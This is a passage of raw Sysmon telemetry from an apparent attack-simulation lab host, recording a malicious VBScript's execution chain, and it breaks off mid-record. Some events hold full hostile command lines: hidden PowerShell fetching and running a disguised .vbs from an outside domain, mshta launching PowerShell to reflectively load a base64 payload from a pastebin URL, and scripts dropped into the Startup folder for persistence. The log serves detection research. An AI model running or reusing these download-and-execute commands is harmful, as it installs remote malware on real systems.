08:03:04.718{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B538-615A-7402-00000000FC01}7400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107892Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.718{58E9C193-B538-615A-6802-00000000FC01}81007248C:\Windows\System32\WScript.exe{58E9C193-B538-615A-7402-00000000FC01}7400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107891Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.731{58E9C193-B538-615A-7402-00000000FC01}7400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://libya2020.com.ly/pic.mp3','C:\Users\ADMINI~1\AppData\Local\Temp\love01.vbs');Start-Process 'C:\Users\ADMINI~1\AppData\Local\Temp\love01.vbs'C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{58E9C193-B538-615A-6802-00000000FC01}8100C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000107890Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.718{58E9C193-B538-615A-7302-00000000FC01}71566512C:\Windows\system32\conhost.exe{58E9C193-B538-615A-7202-00000000FC01}7272C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000107889Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.localT10232021-10-04 08:03:04.718{58E9C193-B538-615A-6802-00000000FC01}8100C:\Windows\System32\WScript.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\docWS.vbs2021-10-04 07:44:22.112 23542300x8000000000000000107888Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.718{58E9C193-B538-615A-6802-00000000FC01}8100ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\docWS.vbsMD5=C29778E3F6B2E3EF93316EF23450C027,SHA256=A6569F10F2E4BEC3470B2D5B227061E92AC6F5D5DCA3CE450C15A0F250A9CDAE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107887Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.718{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107886Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.718{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107885Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.703{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107884Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.703{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107883Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.703{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B538-615A-7302-00000000FC01}7156C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107882Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.703{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B538-615A-7102-00000000FC01}6864C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107881Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.703{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B538-615A-7102-00000000FC01}6864C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107880Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.703{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B538-615A-6E02-00000000FC01}7812C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107879Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.703{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B538-615A-7202-00000000FC01}7272C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107878Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.703{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B538-615A-6E02-00000000FC01}7812C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107877Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.703{58E9C193-B538-615A-6802-00000000FC01}81003652C:\Windows\System32\WScript.exe{58E9C193-B538-615A-7202-00000000FC01}7272C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107876Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.707{58E9C193-B538-615A-7202-00000000FC01}7272C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/d46Ekc57').replace('$%%$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{58E9C193-B538-615A-6802-00000000FC01}8100C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000107875Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.687{58E9C193-B538-615A-7102-00000000FC01}68648004C:\Windows\system32\conhost.exe{58E9C193-B538-615A-6F02-00000000FC01}3056C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000107874Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.localT10232021-10-04 08:03:04.687{58E9C193-B538-615A-6802-00000000FC01}8100C:\Windows\System32\WScript.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsgsdgsdgsdg.vbs2021-10-04 07:44:22.097 23542300x8000000000000000107873Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.687{58E9C193-B538-615A-6802-00000000FC01}8100ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsgsdgsdgsdg.vbsMD5=C29778E3F6B2E3EF93316EF23450C027,SHA256=A6569F10F2E4BEC3470B2D5B227061E92AC6F5D5DCA3CE450C15A0F250A9CDAE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107872Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.687{58E9C193-B538-615A-6E02-00000000FC01}78127988C:\Windows\system32\conhost.exe{58E9C193-B538-615A-6D02-00000000FC01}6984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107871Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.671{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107870Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.671{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107869Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.671{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107868Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.671{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107867Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.671{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B538-615A-6C02-00000000FC01}3824C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107866Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.671{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107865Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.671{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B538-615A-7102-00000000FC01}6864C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107864Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.671{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B538-615A-6C02-00000000FC01}3824C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107863Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.671{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107862Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.671{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107861Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.671{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107860Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.671{58E9C193-B538-615A-6A02-00000000FC01}64561500C:\Windows\system32\conhost.exe{58E9C193-B538-615A-7002-00000000FC01}7676C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107859Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 